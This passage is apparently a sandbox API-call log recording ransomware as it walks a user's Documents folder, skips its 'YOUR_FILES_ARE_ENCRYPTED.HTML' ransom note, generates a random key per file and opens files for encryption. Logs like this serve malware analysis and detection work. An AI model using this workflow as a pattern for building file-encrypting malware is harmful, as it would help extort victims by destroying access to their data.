param_2="%02X" | out: param_1="DF") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="B4") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="C0") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="F2") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="B7") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="91") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="34") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="F2") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="57") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="A6") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="45") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="B8") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="A1") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="E3") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="A6") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="BE") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="47") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="C4") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="70") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="04") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="3A") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="C2") returned 2 [0166.562] wsprintfW 
(in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="6E") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="8D") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="BC") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="68") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="12") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="F9") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="AA") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="09") returned 2 [0166.563] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx" [0166.563] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.563] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.572] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55085c20, ftCreationTime.dwHighDateTime=0x1d7ca73, ftLastAccessTime.dwLowDateTime=0xdbf47bc0, ftLastAccessTime.dwHighDateTime=0x1d7cca2, ftLastWriteTime.dwLowDateTime=0xdbf47bc0, ftLastWriteTime.dwHighDateTime=0x1d7cca2, nFileSizeHigh=0x0, nFileSizeLow=0x13300, dwReserved0=0x0, dwReserved1=0x60, cFileName="A2eWfvrOFlzwUW.xlsx", cAlternateFileName="A2EWFV~1.XLS")) returned 1 [0166.572] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx") 
returned 53 [0166.572] lstrcmpW (lpString1="A2eWfvrOFlzwUW.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.572] PathFindExtensionW (pszPath="A2eWfvrOFlzwUW.xlsx") returned=".xlsx" [0166.572] lstrlenW (lpString=".xlsx") returned 5 [0166.572] PathFindExtensionW (pszPath="A2eWfvrOFlzwUW.xlsx") returned=".xlsx" [0166.572] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx" (normalized: "c:\\users\\5alr3u30d3\\documents\\a2ewfvroflzwuw.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.573] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=78592) returned 1 [0166.573] GetProcessHeap () returned 0x270000 [0166.574] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.574] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="BB") returned 2 [0166.574] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="B1") returned 2 [0166.574] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="E6") returned 2 [0166.574] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="66") returned 2 [0166.574] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="6D") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="48") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="DD") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="04") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="E8") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="F0") returned 2 [0166.575] wsprintfW (in: 
param_1=0x4ebdd6a, param_2="%02X" | out: param_1="37") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="90") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="4D") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="AA") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="37") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="5E") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="5C") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="0D") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="7A") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="30") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="BF") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="1B") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="EC") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="5B") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="FC") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="2A") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="FC") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="CB") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="3A") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="E4") returned 2 [0166.576] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="76") returned 2 [0166.576] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="7C") returned 2 
[0166.576] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx" [0166.576] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.576] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.581] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1214f1a0, ftCreationTime.dwHighDateTime=0x1d7e4f2, ftLastAccessTime.dwLowDateTime=0xbfc90760, ftLastAccessTime.dwHighDateTime=0x1d7e703, ftLastWriteTime.dwLowDateTime=0xbfc90760, ftLastWriteTime.dwHighDateTime=0x1d7e703, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="cXn1G6nnkt", cAlternateFileName="CXN1G6~1")) returned 1 [0166.586] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt") returned 44 [0166.586] GetProcessHeap () returned 0x270000 [0166.586] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0166.586] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt" [0166.586] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\*" [0166.586] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\*", 
lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1214f1a0, ftCreationTime.dwHighDateTime=0x1d7e4f2, ftLastAccessTime.dwLowDateTime=0xbfc90760, ftLastAccessTime.dwHighDateTime=0x1d7e703, ftLastWriteTime.dwLowDateTime=0xbfc90760, ftLastWriteTime.dwHighDateTime=0x1d7e703, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0166.586] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1214f1a0, ftCreationTime.dwHighDateTime=0x1d7e4f2, ftLastAccessTime.dwLowDateTime=0xbfc90760, ftLastAccessTime.dwHighDateTime=0x1d7e703, ftLastWriteTime.dwLowDateTime=0xbfc90760, ftLastWriteTime.dwHighDateTime=0x1d7e703, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.586] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ea11f0, ftCreationTime.dwHighDateTime=0x1d7e6a2, ftLastAccessTime.dwLowDateTime=0x5a8a0980, ftLastAccessTime.dwHighDateTime=0x1d7e6f9, ftLastWriteTime.dwLowDateTime=0x5a8a0980, ftLastWriteTime.dwHighDateTime=0x1d7e6f9, nFileSizeHigh=0x0, nFileSizeLow=0x16d2a, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="4b-1nutJ1.odt", cAlternateFileName="4B-1NU~1.ODT")) returned 1 [0166.587] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt") returned 58 [0166.587] lstrcmpW (lpString1="4b-1nutJ1.odt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.587] PathFindExtensionW (pszPath="4b-1nutJ1.odt") returned=".odt" [0166.587] lstrlenW (lpString=".odt") returned 4 [0166.587] PathFindExtensionW (pszPath="4b-1nutJ1.odt") returned=".odt" 
[0166.587] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\4b-1nutj1.odt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.588] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=93482) returned 1 [0166.588] GetProcessHeap () returned 0x270000 [0166.588] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.592] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="BA") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="E0") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="72") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F6") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="0E") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="DC") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="07") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="2B") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="BB") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="D0") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="07") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="66") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="EB") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="96") 
returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DC") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="25") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3F") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="4C") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="7B") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="8E") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="B4") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E5") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="E5") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="76") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="3E") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="13") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="9A") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="F3") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="71") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="2B") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E9") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="14") returned 2 [0166.593] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt" [0166.593] CreateIoCompletionPort 
(FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.593] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.606] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d2facb0, ftCreationTime.dwHighDateTime=0x1d7dca8, ftLastAccessTime.dwLowDateTime=0xcef78710, ftLastAccessTime.dwHighDateTime=0x1d7e5ec, ftLastWriteTime.dwLowDateTime=0xcef78710, ftLastWriteTime.dwHighDateTime=0x1d7e5ec, nFileSizeHigh=0x0, nFileSizeLow=0x132d7, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="8X9WjuuzW6SgBw9jG.pdf", cAlternateFileName="8X9WJU~1.PDF")) returned 1 [0166.606] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf") returned 66 [0166.606] lstrcmpW (lpString1="8X9WjuuzW6SgBw9jG.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.606] PathFindExtensionW (pszPath="8X9WjuuzW6SgBw9jG.pdf") returned=".pdf" [0166.606] lstrlenW (lpString=".pdf") returned 4 [0166.606] PathFindExtensionW (pszPath="8X9WjuuzW6SgBw9jG.pdf") returned=".pdf" [0166.606] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\8x9wjuuzw6sgbw9jg.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.607] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=78551) returned 1 [0166.607] GetProcessHeap () returned 0x270000 [0166.607] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.608] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="AF") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="0B") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C8") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="89") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="23") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="FF") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="C3") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="CA") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B6") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="E4") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="AA") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D1") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="7D") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="F1") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="23") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0F") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="77") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="AE") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="9D") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="08") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="FE") returned 2 
[0166.609] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="0E") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="03") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A9") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="91") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="98") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="40") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="2F") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="87") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="D4") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="06") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="61") returned 2 [0166.610] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf" [0166.610] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.610] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.618] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbabc940, ftCreationTime.dwHighDateTime=0x1d7e269, ftLastAccessTime.dwLowDateTime=0xdcbcebf0, ftLastAccessTime.dwHighDateTime=0x1d7e287, ftLastWriteTime.dwLowDateTime=0xdcbcebf0, 
ftLastWriteTime.dwHighDateTime=0x1d7e287, nFileSizeHigh=0x0, nFileSizeLow=0x4286, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="auji kIm2DapmjjR1s1D.pdf", cAlternateFileName="AUJIKI~1.PDF")) returned 1 [0166.618] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf") returned 69 [0166.619] lstrcmpW (lpString1="auji kIm2DapmjjR1s1D.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.619] PathFindExtensionW (pszPath="auji kIm2DapmjjR1s1D.pdf") returned=".pdf" [0166.619] lstrlenW (lpString=".pdf") returned 4 [0166.619] PathFindExtensionW (pszPath="auji kIm2DapmjjR1s1D.pdf") returned=".pdf" [0166.619] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\auji kim2dapmjjr1s1d.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.620] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=17030) returned 1 [0166.620] GetProcessHeap () returned 0x270000 [0166.620] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.621] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="AD") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="03") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="82") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="A6") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="19") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: 
param_1="19") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="59") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="AA") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="97") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="44") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="7D") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="13") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="51") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="E5") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="E1") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="AB") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="BB") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="9D") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="8F") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="45") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="45") 